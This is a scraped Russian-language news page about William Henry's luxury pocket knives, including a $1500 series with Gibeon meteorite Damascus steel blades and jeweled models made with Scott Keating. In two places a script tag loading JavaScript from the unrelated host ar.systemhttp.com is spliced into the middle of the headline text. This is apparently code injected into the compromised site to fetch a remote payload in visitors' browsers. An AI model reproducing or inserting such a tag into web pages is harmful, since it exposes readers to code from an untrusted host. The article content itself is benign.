Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
29 окт 2017, 17:29
Баварский автомобильный концерн BMW представил обновленную модель Gran Coupe 4...
Поиск

Какую марку автомобиля вы предпочитаете?

» » «Инопланетный» карманный нож и другие роскошные «безделушки» для мужчин от дизайнера Уильяма Генри

«Инопланетный» карманный нож и другие роскошные «безделушки» для мужчин от дизайнера Уильяма Генри

06 июн 2012, 09:00    ismirnov
0 комментариев    10 789 просмотров

Недавно известный дизайнер Уильям Генри доказал, что чисто мужским принадлежностям тоже «к лицу» быть яркими и блестящими. Доказательством тому стал выпуск эксклюзивной серии перочинных ножей, отделанных золотом и инкрустированных драгоценными камнями и экзотическими материалами.

 «Инопланетный» карманный нож и другие роскошные «безделушки» <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для мужчин от дизайнера Уильяма Генри

Ограниченная серия из 25 перочинных ножей, созданная американским дизайнером Уильямом Генри, интересна не только своим уникальным внешним видом, но и материалом, из которого он сделан.

 

Секрет привлекательности этих ножей, в том, что в состав сплава стального лезвия входят частицы железного метеорита под названием «Gibeon», прилетевшего к нам через тернии галактик. Оказалось, что метеоритный материал имеет очень интересную структуру.

 

Более того, каждый нож обладает своим уникальным рисунком, который создавался в процессе соединения железно-никелевого сплава метеорита «Gibeon» и с дамасской сталью. После воздействия экстремальных температур, сталь получила фиолетово-синюю окраску и неповторимый рисунок структуры металла.

 

Рабочая часть лезвия украшена орнаментом в виде волн. В дополнение к «инопланетной» эксклюзивности Уильям Генри снабдил эту модель перочинного ножа рубином, который исполняет роль кнопки, фиксирующей лезвие.

 

«Инопланетный» ножик, полное название которого Relativity Meteorite Series Jewel Knife by William Henry можно купить за $ 1500.

 

«Инопланетный» карманный нож и другие роскошные «безделушки» <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для мужчин от дизайнера Уильяма ГенриПомимо этой интересной коллекции, у мастера Генри есть ещё модели карманных ножей, которые были разработаны совместно с ювелиром Скоттом Китингом.

 

Эти ножи более подходят к «категории» произведений искусства. Множество узоров ручной работы - на лезвиях и рукоятках ножей, инкрустация с использованием белых, чёрных и коричневых бриллиантов, а также рубинов и сапфиров синего и желтого цвета.

 

Есть ещё, недавно вышедшая коллекция, в которую включены ювелирные наборы роскошных пишущих принадлежностей, зажимов для купюр и даже гольф-инвентаря.

 

Также в планах ювелира выпуск ограниченной серии различных моделей ножей из личной коллекции. Эти ножи будут украшены не только дорогими материалами, но и таким эксклюзивом, как фрагменты бивня мамонта и частицы метеорита.

 

Ножи с таким дизайном вряд ли кто возьмёт в поход или на рыбалку. Их судьба – быть экспонатами у богатых коллекционеров. 

Читайте также
13 мар 2007, 11:20    0 комментариев
 В поисках необычных и дорогих вещей, которые, несомненно, украсят ваш дом, мы натолкнулись на эти вазы. Иногда слышишь фразы...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent